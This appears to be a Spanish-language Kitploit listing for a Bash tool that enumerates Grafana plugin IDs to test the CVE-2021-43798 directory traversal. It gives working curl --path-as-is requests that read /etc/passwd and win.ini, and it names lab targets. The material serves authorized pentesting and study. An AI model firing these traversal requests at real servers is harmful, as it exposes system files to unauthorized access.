Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
Herramientas/GitHubGitHub/squ1shification/grafana-plugin-enumerator-cve-2021-43798
Escáneres de VulnerabilidadesEscáneres de Vulnerabilidades WebExplotaciónScripting y AutomatizaciónExplotación de Aplicaciones WebRecopilación de InformaciónPruebas de Penetración
GitHub
squ1shification/grafana-plugin-enumerator-cve-2021-43798

Grafana-Plugin-Enumerator-CVE-2021-43798

Escáner basado en Bash que enumera los IDs de plugins de Grafana y prueba la vulnerabilidad de directory traversal CVE-2021-43798 intentando leer /etc/passwd o win.ini en instancias vulnerables.

Ver Repositorio
1hace 13h 27mAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

Enumerador de Plugins de Grafana CVE-2021-43798

Una pequeña herramienta basada en Bash para probar instancias de Grafana en busca de CVE-2021-43798, una vulnerabilidad de directory traversal que afecta a versiones vulnerables de Grafana.

La herramienta enumera IDs de plugins de Grafana y utiliza curl --path-as-is para probar si el directory traversal puede acceder a un archivo conocido.

Solo para pruebas de seguridad autorizadas y entornos de laboratorio.

Archivos

root@kitploit:~
.
├── grafana-windows.sh
├── grafana-linux.sh
├── plugins.txt
└── README.md
  • grafana-windows.sh: Prueba el acceso a C:\Windows\win.ini
  • grafana-linux.sh: Prueba el acceso a /etc/passwd
  • : Una wordlist que contiene IDs de plugins de Grafana utilizados durante la enumeración.
plugins.txt

Requisitos

  • Bash
  • curl
  • Un objetivo Grafana
  • Permiso para probar el objetivo

Verifica que curl esté instalado:

root@kitploit:~
curl --version

Haz que los scripts sean ejecutables:

root@kitploit:~
chmod +x grafana-windows.sh
chmod +x grafana-linux.sh

Descripción general de CVE-2021-43798

CVE-2021-43798 es una vulnerabilidad de directory traversal en Grafana.

El endpoint vulnerable se basa en: /public/plugins/<plugin-id>/

La vulnerabilidad puede permitir el traversal fuera del directorio de plugins previsto.

La parte importante al probar con curl es: --path-as-is

Sin esta opción, el cliente puede normalizar la ruta antes de enviarla al servidor.

Escáner de Windows

El escáner de Windows intenta recuperar: C:\Windows\win.ini

La ruta se representa en la solicitud HTTP como: Windows/win.ini

Uso básico

root@kitploit:~
./grafana-windows.sh \
    -u http://192.168.68.193:3000 \
    -w plugins.txt

Ejemplo:

root@kitploit:~
./grafana-windows.sh -u http://TARGET:3000 -w plugins.txt

Prueba manual en Windows

Puedes probar manualmente un plugin con:

root@kitploit:~
curl --path-as-is \
"http://TARGET:3000/public/plugins/alertlist/../../../../../../../../Windows/win.ini"

Para el objetivo de laboratorio:

root@kitploit:~
curl --path-as-is \
"http://192.168.68.193:3000/public/plugins/alertlist/../../../../../../../../Windows/win.ini"

Una respuesta exitosa debería contener el contenido del archivo INI de Windows.

Escáner de Linux

El escáner de Linux intenta recuperar: /etc/passwd

Uso básico

root@kitploit:~
./grafana-linux.sh \
    -u http://192.168.68.193:3000 \
    -w plugins.txt

Ejemplo genérico:

root@kitploit:~
./grafana-linux.sh -u http://TARGET:3000 -w plugins.txt

Prueba manual en Linux

root@kitploit:~
curl --path-as-is \
"http://TARGET:3000/public/plugins/alertlist/../../../../../../../../etc/passwd"

Para el objetivo de laboratorio:

root@kitploit:~
curl --path-as-is \
"http://192.168.68.193:3000/public/plugins/alertlist/../../../../../../../../etc/passwd"

Una respuesta exitosa en Linux debería contener entradas similares a:

root@kitploit:~
root:x:0:0:root:/root:/bin/bash

Opciones de línea de comandos

Ambos escáneres utilizan los mismos argumentos básicos:

  • u, --url : URL base de Grafana
  • w, --wordlist : Wordlist de plugins
  • f, --file : Archivo a probar
  • h, --help : Mostrar ayuda
Descargar herramienta